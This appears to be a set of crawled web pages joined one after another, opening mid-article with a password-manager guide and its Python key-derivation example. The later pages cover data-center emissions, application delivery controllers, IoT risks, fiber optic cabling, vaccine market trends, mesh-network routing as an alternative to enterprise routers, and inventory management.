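salt = os.urandom(16)               # random, stored alongside the vault
key = derive_vault_key("correct horse battery staple", salt)
# Same password + same salt -> same key; wrong password -> different key.
assert key == derive_vault_key("correct horse battery staple", salt)
assert key != derive_vault_key("wrong password", salt)
```

The high iteration count is the point: it costs you a fraction of a second at unlock, but multiplies an attacker's brute-force cost by the same factor for every guess.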
Selecting the Right Password Manager
Choosing the right password manager is crucial. There are various types, each with its own advantages and disadvantages. Some store passwords locally on your device, while others use cloud storage, allowing access from multiple devices even if one is lost.
While many free password managers are available, they often lack important features like multi-factor authentication (MFA) and may not be updated regularly.
Tips for Managing and Organising Passwords
Everyone has a role to play in managing and organising passwords, but a password manager makes the job easier.
Start by maintaining good password hygiene: use complex passwords and passphrases, change them regularly, and never reuse them. Avoid sharing passwords with others.
When choosing a password manager, look for features such as MFA, a random password generator, and an encrypted vault that only you can access. Additional tools, like autofill for forms or mobile app PIN unlock and fingerprint login, can also be useful. | <urn:uuid:700b025b-0eab-46f5-9dec-b1306e8acd28> | CC-MAIN-2024-38 | https://cobweb.com/content-hub/tag/bad-passwords/ | 2024-09-13T20:48:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00728.warc.gz | en | 0.921434 | 1,200 | 3 | 3 |
Considerable focus goes into reducing greenhouse emissions from vehicles, manufacturing, and even agriculture – as it should. But truly addressing climate change will require concerted efforts in every industry. While digital technologies are often the ‘greener’ way to do things, every source needs to be examined for opportunities to decrease greenhouse gas production. This includes approximately 17.5% of emissions from the energy used to light, heat, cool, and electrify buildings. Around 7% of those emissions are from commercial buildings, the category that includes data centers.
Estimates are that about 2% of total greenhouse gas emissions can be attributed to data centers. While this is a small percentage of the whole, it’s not insignificant. And every bit counts. There are tangible opportunities for increasing energy efficiency in data storage and transmission. Implementing these measures now will help mitigate the impact of increased data use in the future.
This Earth Day is a chance for people in every industry to understand their impact on the global climate and identify actions they can take to make real change. While livestock farmers examine ways they can reduce harmful greenhouse gases, those of us in the tech industry can focus on our server farms.
Efficiencies built into modern data centers
According to the U.S. International Trade Commission, there are nearly 8,000 data centers globally, with about 33% of them located in the United States. While you’re unlikely to encounter greenhouse-emitting animals roaming around, data centers nonetheless have a reputation for being energy hogs. Servers require considerable amounts of energy, as do lights, fans, monitors, security, and cooling systems. Much of this energy still results in the production of greenhouse gases.
In the past decade, human energy has been flowing into innovations for decreasing the climate impact of data storage and transmission. In fact, according to the International Energy Agency, the industry’s share of global electricity use has hardly changed since 2010, even though the number of internet users has doubled and global internet traffic has increased 15-fold. This comes from the use of more efficient hardware as well as green innovations in buildings and cooling systems.
But most experts believe that continued high demand in the technology sector will fuel growth that will eventually outstrip efficiency gains. So the quest for lower energy consumption continues, especially as companies that are still hosting in-house systems are moving to the cloud.
Migrating to the cloud decreases carbon footprint
On the face of it, it would seem that energy is energy, but according to a report by 451 Research, moving applications to the cloud could compress the energy footprint of a workload to one-fifth compared to running the same workload on-premises. In addition to the efficiencies of shared infrastructure, data centers use virtualization software that enables operators to deliver greater work output with fewer servers.
Tackling climate change in our global data infrastructure is an all-hands opportunity. As individual companies continue moving to the cloud, we can increase efficiency workload-by-workload. Meanwhile, the largest cloud providers, including AWS and Microsoft, are making bold commitments to address their climate impact. In 2020, Microsoft announced plans to be carbon negative by 2030. And they plan to shift to 100% renewable energy by 2025 for powering their data centers, buildings, and campuses.
This Earth Day, the world is recognizing that it’s not enough to simply try harder when it comes to addressing climate change. From the farms that feed us to the server farms that fuel our data economy, it’s time to move together toward zero greenhouse gas emissions. BitTitan is proud to do our part by helping companies increase efficiency by migrating to the cloud. With MigrationWiz, every day can be Earth Day. | <urn:uuid:76c45c8f-735b-4c66-b129-d951a52003f1> | CC-MAIN-2024-38 | https://get.bittitan.com/blog/from-the-experts/from-animal-farms-to-server-farms-addressing-technologys-climate-impacts/ | 2024-09-13T22:02:15Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00728.warc.gz | en | 0.946891 | 760 | 3.203125 | 3 |
Application Delivery Controller
The application delivery controller (ADC) is used to combine security functions in one device, including application layer security, distributed denial-of-service (DDoS) protection, advanced routing strategies, and server health monitoring combined with basic application acceleration and server load balancing. The ADC is typically placed in a data center between the firewall and one or more application servers in the DMZ.
An ADC installed in a data center DMZ.
The figure shows the concept of an ADC where a number of protection mechanisms are combined in a network device. ADCs are commonly used by high traffic websites as a reverse proxy to scale and accelerate Web applications by front-ending the load from the servers. ADCs can perform TLS offloading, compression, dynamic site acceleration (DSA), front-end optimization (FEO) and mobile content acceleration.
ADCs support application operation and can look deeper into the specific traffic and make more intelligent decisions. They can optimize application server performance by offloading many compute-intensive tasks that would otherwise load the server CPUs needed to deliver applications to users. An ADC can transform or rewrite the content of the client request, including the response from the servers. | <urn:uuid:f955450f-1144-4b1b-913b-6c933537faf3> | CC-MAIN-2024-38 | https://patterns.arcitura.com/cloud-computing-patterns/mechanisms/application_delivery_controller | 2024-09-18T20:30:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00328.warc.gz | en | 0.893708 | 258 | 2.65625 | 3 |
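As a simplified sketch of the load-balancing role described above, the following toy "balancer" fans requests out across healthy back-end servers round-robin and drops a server that fails a health check. Server names and behavior are invented for illustration; a real ADC does this in hardware-assisted data paths with far richer policies:

```python
# Toy model of ADC server load balancing: requests arrive at one
# front-end address and are distributed round-robin across the
# back-end application servers that are currently healthy.
from itertools import cycle

class MiniBalancer:
    def __init__(self, servers):
        self.healthy = list(servers)
        self._ring = cycle(self.healthy)

    def mark_down(self, server):        # health monitoring, simplified
        self.healthy.remove(server)
        self._ring = cycle(self.healthy)

    def route(self, request):
        return next(self._ring), request

lb = MiniBalancer(["app1", "app2", "app3"])
lb.mark_down("app2")                    # failed its health check
print([lb.route(f"GET /{i}")[0] for i in range(4)])
# -> ['app1', 'app3', 'app1', 'app3']
```

The same dispatch point is where an ADC layers in its other functions — TLS termination, compression, and content rewriting happen before the request ever reaches an application server.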
Pardon my skepticism, but it seems like IoT is just another catchy phrase to describe something that has been around for a while.
Coined in 1999 by Kevin Ashton, IoT refers to the connection of devices like household appliances (washers, dishwashers), transport vehicles (automated carts and vehicles), sophisticated equipment (heart-monitoring implants), etc. to other devices or users through the Internet. Basically, these items operate autonomously, but can report on their status and can permit adjustment, intervention, and remote control while performing their programmed duties.
Wikipedia describes IoT as “…the network of physical objects or “things” embedded with electronics, software, sensors and network connectivity, which enables these objects to collect and exchange data… resulting in improved efficiency, accuracy, and economic benefit. Each thing is uniquely identifiable… but is able to interoperate within the existing Internet infrastructure.”
There are many older IoT-type applications already in use:
- A Coke machine reported on quantities and temperature. (This was first demonstrated in 1982 at Carnegie Mellon University.)
- Home-based equipment, from your shades to your alarm system, can be controlled from your smartphone (since the 1990s).
What exactly is new? Growth!
These early attempts were focused primarily on single applications for a limited audience; they basically fed unprocessed data forward or permitted single-user control. Current IoT efforts dream of utilizing big-data processing to unite information and disparate devices with a large population of users.
New and useful applications will arise and be connected, linking us to a brand new world. And, it will not be just embedded electronics in stationary devices, but also wearables (watches, health monitors, wireless cameras, etc.) and drive-ables (from vehicles with embedded computers to Google’s driverless cars) making up the IoT population.
The expectation is that somewhere between 26 billion (Gartner, Inc. forecasts 26 billion IoT devices by 2020) and 30 billion (ABI Research predicts more than 30 billion devices will connect wirelessly to the Internet of Everything) IoT devices will be functional by 2020. Interestingly, the USA, at 24.9 online IoT devices per 100 inhabitants, currently lags behind South Korea (37.9), Denmark (32.7), and Switzerland (29.0), according to the OECD’s Digital Economy Outlook 2015, Chapter 6, Figure 6.6.
With tremendous growth comes great and, sometimes, undesired consequences. Issues being discussed and addressed include:
- Data will explode, requiring greater storage, access, and processing
- Internet bandwidth will be consumed and, at times, found lacking
- Wireless networks should expand and improve
- Security may be compromised
- Legal challenges shall multiply
- Electricity use will change
- Privacy will be invaded
Data will explode, requiring greater storage, access, and processing
Where is all of this data going to be stored? Who will have access and how will it be enabled? What processing capabilities will be required to make sense of it all? After its useful life, how will data be removed (or at least archived)?
Internet bandwidth will be consumed and, at times, found lacking
Seems like bandwidth is already constrained in my home; will I need to unplug my refrigerator to watch Netflix? Will there be enough bandwidth not only inside the home or office, but also connecting the home/office to the Internet? Will Internet Service Providers be able to handle this coming surge in demand?
Wireless networks should expand and improve
Things don’t connect unless they are wired or have available wireless access: Will wireless networks be there when they are needed? Will they be able to provide sufficient bandwidth and coverage areas? Who will own them?
Security may be compromised
How will you safely authenticate devices against other devices and against multiple users? Can these devices be patched and/or updated in a secure and consistent manner? What if you purchase a smartHome and the previous owner does not release the smart technology; will you need to replace these items, or will there be a master override? (Marilyn Cohodas comments on some of these issues in her article: “4 IoT Cybersecurity Issues You Never Thought About” in the 9/24/2015 issue of InformationWeek DARKReading.)
Also, a July 2014 study by Hewlett-Packard found that six of 10 popular IoT devices surveyed were vulnerable to significant security issues and that seven of these devices used unencrypted network services. (See the article: “Popular Internet of Things devices are not Secure” by Lucian Constantin in the 7/30/2014 edition of ComputerWorld.)
Legal challenges shall multiply
What if your home-based device sent forth information you agreed to provide, but other family members or visiting friends did not wish to provide? Who is liable when this information ends up in the wrong hands?
Please review “Top 5 Legal Issues in the Internet of Things, Part 1: Data Security & Privacy” by Brian Wassom at Wassom.com.
Electricity use will change
Unless unplugged, electronics-enabled devices are connected 24×7, consuming electricity the entire time. Multiply this usage against billions of devices and our power needs and power consumption may change dramatically.
One promising note: Energy use will be monitored closely, with the likely result that optimization will occur, balancing power generation with energy use (and even decreasing energy use in some situations).
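A back-of-envelope estimate shows the scale involved. Both the device count and the per-device draw below are assumptions:

```python
# Standby electricity for a fleet of always-on IoT devices (illustrative).
devices = 30e9          # upper 2020 forecast cited above
watts_each = 2.0        # assumed average always-on draw per device
hours_per_year = 8760

twh_per_year = devices * watts_each * hours_per_year / 1e12
print(f"{twh_per_year:.0f} TWh/year")
# ~526 TWh/year -- on the order of a large industrialized
# country's total annual electricity consumption.
```

Even if the real average draw is a fraction of a watt, the multiplier of tens of billions of devices makes per-device efficiency a first-order design concern.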
Privacy will be invaded
When my blender rats me out and tells the world that I made a chocolate shake after midnight, what will manufacturers conclude about me and my habits and who will they tell? Also, can I trust these manufacturers to use my household data wisely and keep it secure? Do standards exist to protect me from snooping?
See Brian Wassom’s article: “The Internet of Things that Eavesdrop and Invade Privacy” on 7/30/2015 at Wassom.com.
Evolving regulations and standards
Fortunately, the US Federal Government is addressing these areas with new insights and rulings:
- The Senate introduced Res. 110 in March of 2015 and the House followed with H. Res. 195 in April; both recognize the need for national-level development of an IoT strategy, best practices, and communications.
- FTC urges Best Practices to Address Consumer Privacy and Security Risks.
- DHS is seeking best ideas on “…how we can mobilize and repurpose cutting-edge smart technologies to strengthen the safety and security of our nation.”
The IoT is here now; it will get better with time, but make sure you know the risks and potential consequences when you enable it in your home or office. | <urn:uuid:27fb4186-5c1e-41cc-8d11-2310491b905b> | CC-MAIN-2024-38 | https://www.bryley.com/tag/iot/ | 2024-09-09T06:12:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651072.23/warc/CC-MAIN-20240909040201-20240909070201-00328.warc.gz | en | 0.923818 | 1,394 | 2.96875 | 3 |
With the advances of the information age, many professionals in the field of network communication have begun to attach great importance to the selection of fiber optic cables. From data and voice to security and videoconferencing, plenty of contemporary cable infrastructure services depend heavily on fiber optics to transmit information over longer distances at higher speeds, which makes fiber optics a standard component in daily communication nowadays. Fiber optics are considered a desirable cable medium because of their immunity to electromagnetic interference (EMI) and radio frequency interference (RFI), not to mention the bandwidth that helps meet increased capacity demand, and a reliable reputation that ensures worry-free maintenance. This article focuses primarily on some essential components in fiber optic installation and provides some insight into selecting the right fiber optic cable.
Fiber optic cable basically can be used in a wide variety of applications, ranging from small office LANs, data centers to inter-continental communication links. Moreover, its ability to transport signals for significant distances also contributes to its popularity in most networks, whether they are local, wide area or metropolitan. In fact, fiber optic cable is now running down many residential streets and brought directly to the house. Thus, choosing the appropriate fiber optic cable is extremely important for any installation.
The selection of the right type of fiber should be based on the immediate application, since requirements vary with circumstances. Besides, installers should also consider upcoming applications and capacity needs. Future bandwidth demands, transmission distances, applications, and network architecture influence fiber selection just as much as current needs. Therefore, a careful assessment of potential network usage will help avoid the costs of preventable upgrades.
First and foremost, on selecting the right type of fiber, one should decide the mode of fiber needed. The mode of a fiber cable describes how light beams travel on the inside of the fiber cables themselves. Since the two modes aren’t compatible with each other and you can’t substitute one for the other, it is important to make the right choice.
Single-mode fiber optic cable uses a single strand of glass fiber for a single ray of light transmission, which can accommodate further distances and offer virtually unlimited bandwidth. Single-mode has the capacity to carry a signal for miles, making it an ideal option for telephone and cable television providers. And it is also usually employed in campus and metropolitan networks. Single-mode fiber requires laser technology for sending and receiving data, and the high-powered lasers transmit data at greater distances than the light used with multimode fiber.
Multimode fiber optic cable, as the name indicates, allows the signal to travel in multiple modes, or pathways, along the inside of the glass strand or core. Multimode fiber optic cable is generally adopted in applications involving shorter distances, like data center connections. Multimode fiber optic cable transmits Gigabit Ethernet up to 550 m; although it can’t compete with single-mode fiber optic cable in terms of transmission distance, multimode fiber cable still proves to be a cost-efficient and economical solution.
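The distance guidance above can be boiled down to a rough chooser. The 550 m multimode limit for Gigabit Ethernet comes from the text; the single-mode figures are common planning numbers rather than hard limits, and real designs must also account for optics, splices, and loss budgets:

```python
# A rough fiber-type chooser based on link distance (illustrative only).
def choose_fiber(distance_m, gigabit=True):
    if gigabit and distance_m <= 550:
        return "multimode"      # cheaper optics, fine for short runs
    if distance_m <= 10_000:
        return "single-mode"    # laser optics, campus/metro distances
    return "single-mode (long-haul optics)"

for d in (80, 550, 2_000, 40_000):
    print(f"{d:>6} m -> {choose_fiber(d)}")
```

In practice the decision also weighs future upgrades: a run that is multimode-safe today may need single-mode headroom when link speeds increase.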
Connections play an essential role in keeping the information flowing from cable to cable or cable to device. There are lots of connector styles on the market including LC, FC, MT-RJ, ST and SC. There are also MPO/MTP style connectors that will accommodate up to 12 strands of fiber and take up far less space than other connectors. Among them, manufacturers and distributors are more likely to have equipment to accommodate ST and SC style connectors than any other connector style. Especially the SC connectors, with better performance against loss, more efficient installation and easier maintenance, has earned its place in today’s networking applications. As for those data center managers who attach more importance to space-saving, the LC connector is a more ideal option. These connectors offer even lower loss in a smaller form factor and provide higher performance and greater fiber density.
In addition to fiber type and connector selection, another vital issue for the technician is to evaluate the interface option, which determines the network performance. The selection of interface depends on the fiber type, cable distance and speed of the connection as well. Installers can rely on modular Gigabit fiber-optic interfaces, called gigabit interface converters (GBICs), for most conversion needs. These flexible interfaces come in several form factors, including XENPAK and SFP+, and can accommodate a variety of device applications. The picture below shows a typical gigabit fiber optic converter.
While choosing the right interfaces, installers need to take their light sources into consideration. Light-emitting diodes (LEDs) work only with multimode fiber and typically operate in the 850 nm window; edge-emitting lasers work with single-mode fiber and operate in the 1310 nm and 1550 nm windows; and vertical-cavity surface-emitting lasers (VCSELs), which drive most short-reach multimode links, operate in the 850 nm window.
In summary, to build a well-performed fiber optic system, realizing the applications and capacity expectations should be put into first place. As you can see, selecting the appropriate cable design for your application should require a thorough review of the entire pathway for the cable, including the type of fiber, optical connectors as well as interface options. The decision of selection can affect the fiber protection and performance, ease of the installation, splicing or termination, service lifetime, and, most importantly, cost. | <urn:uuid:ee7fd815-0be2-42bb-8725-6cdda3ec25a1> | CC-MAIN-2024-38 | https://www.fiber-optic-components.com/tag/single-mode-fiber-optic-cable | 2024-09-12T21:54:15Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00028.warc.gz | en | 0.926023 | 1,108 | 2.671875 | 3 |
These issues include tackling the diseases that lack an effective vaccine and developing new technologies and approaches to address a future pandemic.
A new report from Frost & Sullivan highlights the platforms that can help companies overcome these challenges and make significant progress in vaccine development.
Tech Transfer is Accelerating Disruption
The COVID-19 pandemic undoubtedly led to a dramatic increase in investment and activity in the vaccine industry as companies raced to develop a vaccine to deal with the virus.
This also led to a shift toward tech transfer—the process of moving technology from one company or organization to another—and the entry of new, resourceful start-ups.
More emphasis is being placed on bringing innovation into the development, process and design of next-generation vaccines to maintain a stronghold on the market.
Other growth areas include controlled temperature chain (CTC) and heat-stable vaccines, which will be a major part of vaccine development programs between 2022 and 2025.
Factors Driving Disruption in the Vaccine Industry
Several factors are driving disruption in the vaccine industry, including the patient-centric approach seen during the pandemic to develop streamlined and resilient solutions.
Key industry players are engaged in sharing the next-generation vaccine platforms by leveraging the capabilities and long-standing expertise of innovation leaders, leading to a win-win situation to overcome the competitive barriers.
In addition, companies need to develop needle-free delivery and look at novel disease indications such as cytomegalovirus and glioblastoma, an aggressive type of cancer, for new growth avenues.
One of the major revenue boosts is the strategic procurement of vaccines by governments for their national immunization programs, which will inevitably lower vaccine prices and improve national health outcomes.
Key Growth Opportunities in the Vaccine Industry
There will be significant growth in the coming years as new technologies and approaches are being developed by mid-sized to large companies to address a variety of chronic diseases.
One area of promising research is the development of nucleic acid-based vaccines, which have shown great potential in the treatment of cancer and HIV.
Companies are also exploring new disease areas that have been untouched by vaccine development, including vaccines for asthma, Respiratory Syncytial Virus (RSV) Infection, and diabetes.
Utilizing platforms and models designed for COVID-19 vaccine development will help companies save time and resources as they make huge steps in developing vaccines for other disease areas.
Global Vaccine Market to Experience Significant Growth
The global vaccine market is anticipated to experience significant growth in the coming years as new technologies and approaches are developed to address a variety of diseases.
Companies can make significant progress in developing and producing new vaccines by utilizing the advanced platforms and models designed for COVID-19 vaccine development.
Finally, the transfer of technology to different regions will boost efficiencies and the capacity to deal with future pandemics as vaccine solutions are developed and distributed more quickly.
Frost & Sullivan provides an outlook for the global vaccine industry for 2022 and beyond, including emerging trends and growth opportunities, in a new study: https://bit.ly/3LKMOKc | <urn:uuid:56b069d2-5274-4560-b7b7-f5373b812f81> | CC-MAIN-2024-38 | https://dev.frost.com/growth-opportunity-news/growth-opportunities-in-the-global-vaccine-market/ | 2024-09-16T13:17:08Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.32/warc/CC-MAIN-20240916112213-20240916142213-00628.warc.gz | en | 0.950459 | 637 | 2.578125 | 3 |
The Routerless Enterprise
Routers – supplied by companies such CISCO, Huawei, Juniper, etc. – are the cornerstone of Enterprise networks and a possible intrusion vector to steal trade secrets in a fierce international competition context.
Back 15 years ago, it is said that German government financed the GPG open source project after it discovered that US government had been spying its diplomatic delegation at United Nations (UN) through backdoors present in a US made router . CISCO routers are likely to include backdoors . Huawei routers are banned in certain countries for similar rationale . And Alcatel routers do not seem to be less exempt of backdoors either .
15 years after rumours of router intrusions emerged, Edward Snowden reports have provided evidences of the existence of backdoors in telecommunication equipment. Yet, companies, governments and military still rely on routers for very sensitive infrastructure and thus expose themselves to remote intrusion and trade secret theft. Free Sofware routers such as the Linux router project are a good solution to eliminate backdoors because most of their code can be audited. But they failed to scale and match carrier grade reliability due to the limitation of the PC architecture, to the absence of open source drivers for high performance network cards or to difficulties of hiring developers that understand the Linux kernel network stack. Lost Oasis, an independent French telecommunication company which used to be a major user of the Linux Router project in the early 2000, now relies on proprietary routers for its backbone network.
Yet, one alternative has not yet been fully considered for Enterprise networks: mesh topology.
Most enterprise networks are centralized. They are based on so-called hierarchical topology, where a central high performance router acts as border gateway to the outside world and aggregates network traffic from smaller routers in charge of each region or department of an organisation. This central router has to provide extremely high routing performance, something that a only specialized hardware can achieve.
But if we look in detail, nothing except maybe access control rules actually require a centralized networking architecture. Network routing is often compared to car traffic management. There is for example no need for cars to pass through Beijing in order to travel from Shanghai to Shenzen. It is the same for networks: there is no need for network packets to go through a central router at the headquarters of a company in order to travel from one corporate department to another. With a good car navigation technology – such as Amap or Google Maps – car drivers can even know in real time which small roads can be used to circumvent congestion on highways. It is the same for networks: modern routing protocols can automatically circumvent network delays on congested routers and find a faster path at any time.
Thanks to advances in routing protocols known as babel or OLSR , it is now possible to design an Enterprise network based on the above metaphor of roads and car navigation. Every network cable or wireless network acts like a road for network packets. Every PC and every smartphone acts like a crossing. Every PC and every smartphone embeds a routing service that acts like a car navigation system by tracking the speed of the network traffic on each cable or wireless network. Network packets that are sent from one part of the company to another part of the company can thus find at any time the most efficient route to take. If one network cable required to access a server remains always congested, adding a second cable will likely solve congestion, just like adding a second access road can solve congestion to reach a popular exhibition center. By advising packets to take the least congested route at any time, traffic gets automatically split between the two cables – for a server – or between the two roads – for an exhibition center.
What we have just described is called a mesh network. It is known to be the most resilient form of network since it can still operate in case of partial destruction, which is not the case of hierarchical enterprise networks. Mesh networks are used primarily by military to quickly deploy a wireless network on a battle field. Each soldier’s PC acts as a router for neighbouring soldiers. Casualties among soldiers do not have consequences on the general availability of the network.
But mesh networks could have many civilian applications in data centers or in wide area wired networks.
Let us imagine for example a datacenter with 160 servers. Let us split the 160 servers in 32 groups of 5 servers. Each server in a group of 5 servers is connected to a non manageable switch through its first network interface. The second network interface of each server in a group of 5 servers is then connected to a server in 5 other different groups. Network cables connected on the second interface of each server form together called a “hypercube”, a geometric structure similar to the cube (see illustration bellow) but in a 5 dimension space. A total of 320 cables are used to interconnect 160 servers with a huge potential bandwidth and high resiliency: each server can access another server in another a group through 5 possible different exit routes. The routing protocol – babel for example – finds at any time which of the 5 possible exit routes is the best to reach another server.
Illustration – a hypercube mesh network for data center management (credit Wendelin project)
Let us now imagine a company with 1000 users of laptops and smartphones and 30 servers in 20 different countries. This company uses a combination of network technologies: optical fiber, 3G, 4G, DSL, Wifi, etc. For this type of situation, we can use a structure called a “random mesh”. Each laptop, smartphone or server creates randomly 10 links to other laptops, smartphones or servers in the world. Each link uses some kind of encapsulation such as GRE. Links play here the same role as cables in the previous datacenter example. The routing protocol – babel for example – finds at any time the fastest route between two device by combining links. With about 1000 device and 10 links per device, this route does not usually require more than 3 successive links.
The re6st open source project that was initiated by my company is an example of implementation of the “random mesh” approach based on babel. It has been used since 2013 to solve downtime problems often found in transnational deployments of online business applications for large European and Japanese companies. Configuration of routers in peering points sometimes include errors that either lead to extremely high latency (ex. 800 ms from Hong-Kong to Hong-Kong) or to connectivity loss (ex. from Dublin to Paris via broken router in Amsterdam). The use of re6st helps reducing latency (ex. 100 ms from Hong-Kong to Hong-Kong via Singapore) or recovering connectivity (ex. from Dublin to Paris via Marseilles) by discovering alternate routes. It thus provides better online access to business applications in a multinational company without having to rely on redundant dedicated lines.
Online gaming industry in China could be another possible application of mesh networking. By creating a fully connected mesh between all gaming servers and deploying babel with re6st, it is possible to circumvent congested routed between north and south of China, between cities or between telecommunication companies. Babel protocol has been extended in 2014 to optimize routes based on low latency, which is exactly what online gamers are expecting.
Mesh networks have many other applications: telematics in the automotive industry [11, 12, 13], distributed mesh cloud , internet of things, smart cities, control systems in navy, etc. One should however be careful about one aspect in mesh networks: security. As in any distributed system, intrusion in one part of the system bears the risk of propagating to the whole system. Since the system is distributed, there are many more entry points than with a centralized system. Critics of distributed networking architectures often point this risk to stick to a conservative approach, but also ignore the danger of single point of failure in hierarchical networks which can tear down instantly the whole network.
The babel protocol provides a first solution to strengthen security: authentication certificates. Thanks to the efforts of Yandex engineer in Russia, all nodes in a babel network authenticate each other: this reduces the risk of accepting intruders . re6st provides another solution: authentication of links . Intruders without a valid certificate can not create a links to other nodes of a re6st network. re6st can also revoke certificates of compromised nodes. For large corporations or distributed cloud operators, a hybrid approach combining central definition of firewall policies with distributed implementation of packet filtering rules may provide the best of both worlds.
I hope that this article will raise your curiosity and lead you to research more about networking protocols that have made immense progress compared to the 26 years old OSPF used by most corporations (RFC 1131 published in October 1989). There many protocols similar to babel which are worth considering: AODV , batman , OLSR, RPL , etc. “Fair routing”, an algorithm that prevents malicious intruders from deviating network traffic , could also solve the unresolved problem of building a truly secure network. RINA , a new networking protocol supported by John Day and Louis Pouzin (two pioneers who inspired the Internet), introduces an innovative approach that unifies all network protocols better than IPv6. Overall, network innovation is still alive and potentially very useful to design Enterprise networks more efficiently, as long as one tries to look beyond traditional suppliers of hardware routers.
GPG – http://en.wikipedia.org/wiki/Werner_Koch
NSA blamed for adding backdoors to made in USA routers – http://www.numerama.com/magazine/29353-la-nsa-accusee-d-avoir-piege-les-routeurs-americains.html
Huawei boss says US ban not very important – http://www.bbc.com/news/business-29620442
Alcatel OmniSwitch 7700/7800 switches backdoor – http://www.acunetix.com/vulnerabilities/network/vulnerability/alcatel-omniswitch-7700-7800-switches-backdoor/
Linux Router Project – http://en.wikipedia.org/wiki/Linux_Router_Project
Lost Oasis – http://www.ielo.net/
AutoNavi – http://en.wikipedia.org/wiki/AutoNavi
Google Maps – http://en.wikipedia.org/wiki/Google_Maps_Navigation
Babel – http://en.wikipedia.org/wiki/Babel_%28protocol%29
OLSR – http://en.wikipedia.org/wiki/Optimized_Link_State_Routing_Protocol
Carmesh – http://www.carmesh.eu/
Ford working on car-to-car mesh network – http://www.extremetech.com/extreme/92532-ford-working-on-car-to-car-wireless-mesh-network-for-real-time-telemetry-government-use
The Fully Networked Car – http://www.itu.int/dms_pub/itu-t/oth/06/10/T06100004020001PDFE.pdf
VIFIB wants to host your cloud at home – http://www.pcworld.com/article/198755/ViFiB_Wants_You_to_Host_Cloud_Computing_at_Home.html
RFC 7298 – https://tools.ietf.org/html/rfc7298
re6st – http://lists.alioth.debian.org/pipermail/babel-users/2013-January/001132.html
AODV – http://zh.wikipedia.org/wiki/AODV
B.A.T.M.A.N. – http://en.wikipedia.org/wiki/B.A.T.M.A.N..
RPL – http://www.bortzmeyer.org/6550.html
A Fair and Secure Cluster Formation Process for Ad Hoc Networks – http://link.springer.com/article/10.1007/s11277-010-9994-7
IRATI – https://github.com/IRATI | <urn:uuid:5af033d6-e889-49b3-bff3-82b421bbb0e3> | CC-MAIN-2024-38 | https://www.ctocio.com/tech/networking/18624.html | 2024-09-17T18:06:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00528.warc.gz | en | 0.900078 | 2,534 | 2.578125 | 3 |
The 2021 Texas power crisis was the result of many things—being unprepared for an extreme snowstorm, inadequately winterized power equipment, power grids isolated to the state, and so on. However, it’s fair to say this crisis was largely a miscalculation of risks. It was a failure to predict and mitigate a series of compounding factors, which led to a break under pressure. We can call it a failure in Systems Thinking.
After the fact, it’s easy to say that Texas should have winterized their wind turbines, but that’s only one detail—the crisis was the sum of much more. All power took a hit, including coal and nuclear. Worse, gas production froze along with pipelines.
As heating demands rose sharply, the lack of natural gas was problematic as many of Texas’s power plants rely on gas to generate their electricity, thus the power grids going offline was inevitable. The halt of gas production was perhaps the biggest culprit in the power crisis, but the broader system—particularly electrical infrastructure across much of the state—had little recourse without it. It was an inability to mitigate undesirable emergent behaviors and cross-dependencies that resulted in catastrophic failure.
Again, a failure in Systems Thinking.
Systems Thinking says nothing lives in isolation. Everything affects everything. It’s like the butterfly effect of chaos theory, which isn’t to say butterflies set off chain reactions that blow volcanos or cause tsunamis, but that the Earth is a complex and interlinked system, where even something as small as a butterfly is moving with everything else.
The idea of managing complexity in systems is nothing new—System Thinking has been around for decades. The challenge now is that many organizations still aren’t giving Systems Thinking its proper due, sometimes with a great cost. This is true even of PLM and its users, but vendors are catching up.
The concept of the butterfly effect was first used to describe the impossibility of predicting the weather far into the future, because weather systems are too complex for us to track every proverbial butterfly. Similarly, it is impossible for any one person to fully understand today’s design complexity, which is increasing at an ever-accelerating pace. No one can or should predict every little variant or mistake on their own. So rather than chasing butterflies, we can govern our design complexity with effectively applied Systems Thinking.
We do this with a modern PLM platform capable of tracking all life cycles of the system, from conception and design to operation and maintenance.
Because of rising complexities in today and tomorrow’s products, with more functionality and more variance of functionality, often the design of a product has become the design of a system with many different implementations. PLM platforms came from the mechanical world that focused on just the product. Now they’re evolving to meet a world of systems—a world where you have to have to manage everything about a system as a system of systems first, without knowing the details of the design of products.
We apply Systems Thinking to how we look at what PLM is managing. Because everything affects everything, it is critical the platform be able to connect the product at all stages to a system model, such as with a Digital Thread. Tools have to be able to show their data models to PLM data models. Whatever system PLM is going to manage in the future, it has to do so in the context of a data model of that system, where every change goes through said model. The system model is the connective tissue sitting inside PLM and everything in PLM connects through it. That is the crux of Systems Thinking.
PLM used to manage just design data. Now we’re managing design intent, which drives design data. We can’t predict the outcome of every storm, so we should instead prepare to mitigate their effects.
Steven Jobs once said, “You can't connect the dots looking forward; you can only connect them looking backwards.” Predicting the future—and future failures like in Texas—requires full traceability from the beginning—in short, with a Digital Thread and the platform to support it. This is the strength of a PLM Platform, as they not only manage design data, but also the system across the entire lifecycle from the start to any indefinite point in the future.
Failure may not always be completely preventable, but with the right thinking and platform, it should always be manageable.
Mark Reisig is the Vice President of Product Marketing at Aras. | <urn:uuid:05893bdb-aee6-46b7-88d1-578ead740189> | CC-MAIN-2024-38 | https://www.mbtmag.com/software/blog/21440005/managing-failure-systems-thinking-and-the-butterfly-effect | 2024-09-19T01:06:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651944.55/warc/CC-MAIN-20240918233405-20240919023405-00428.warc.gz | en | 0.961563 | 935 | 2.5625 | 3 |
Inventory management is a crucial discipline for businesses, as it enables them to minimise the cost that inventory carries on the balance sheet. Inventory is commonly classified into three categories: raw materials, work-in-progress and finished goods.
What Is Inventory?
Inventory is the accounting of items, component parts and raw materials that a company either uses in production or sells. As a business leader, you practice inventory management in order to ensure that you have enough stock on hand and to identify when there’s a shortage.
